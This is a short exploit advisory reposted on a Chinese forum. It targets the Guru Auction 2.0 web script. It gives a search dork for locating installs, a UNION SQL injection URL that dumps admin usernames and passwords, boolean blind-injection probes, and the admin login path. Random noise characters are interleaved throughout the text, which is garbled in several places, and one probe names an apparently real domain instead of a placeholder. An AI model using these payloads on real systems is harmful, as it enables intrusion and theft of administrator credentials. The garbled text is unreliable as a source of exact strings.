Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
) u* N8 d) L$ D9 {3 _& Z0 X+ R) v6 f/ g' s5 J/ q0 t3 f
作者 : v3n0m
. R$ ?) n3 Y E8 r. c应用 : Guru Auction 2.0. z; j! J c4 J
Price : $49
; L/ J- q% d/ t( U, g; w {Vendor : http://www.guruscript.com/. I# i8 c9 d& W- G. [2 j
Google Dork : inurl:subcat.php?cate_id=5 @( q1 [6 M0 Y1 g5 F
7 T g, M8 r+ K' t' ?. S
SQLi p0c:
0 C w9 B: {- b- \ n" ]+ ?; @~~~~~~~~~~4 r+ {8 L6 x6 ?; G. @) `5 s; Z2 v$ G, e
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--. i# e( s- d3 J: {1 h0 H1 G6 H" V
9 i% q" i5 H/ M+ w; O, G: ], l
9 R6 R% K0 n. @4 K" F: d- E盲注 p0c:
; s+ q4 e) h" S~~~~~~~~~~
/ j5 u5 t8 M0 O$ C5 D5 e7 Bhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
+ g5 `8 Z5 Y: k! nhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false1 L+ R: H9 G7 k4 m" Q) W, D3 u8 z2 N
& U- S) c( o/ A, Q
管理登录入口:
; p: I! @2 ?; R% k" ]* Q. [~~~~~~~~~~* F6 _) e3 g1 _- Z' M2 d: ~/ n
http://domain.tld/[path]/admin/7 k/ i1 M( @* H4 Y
|
发表于 2012-12-31 09:24:05
收藏
支持
反对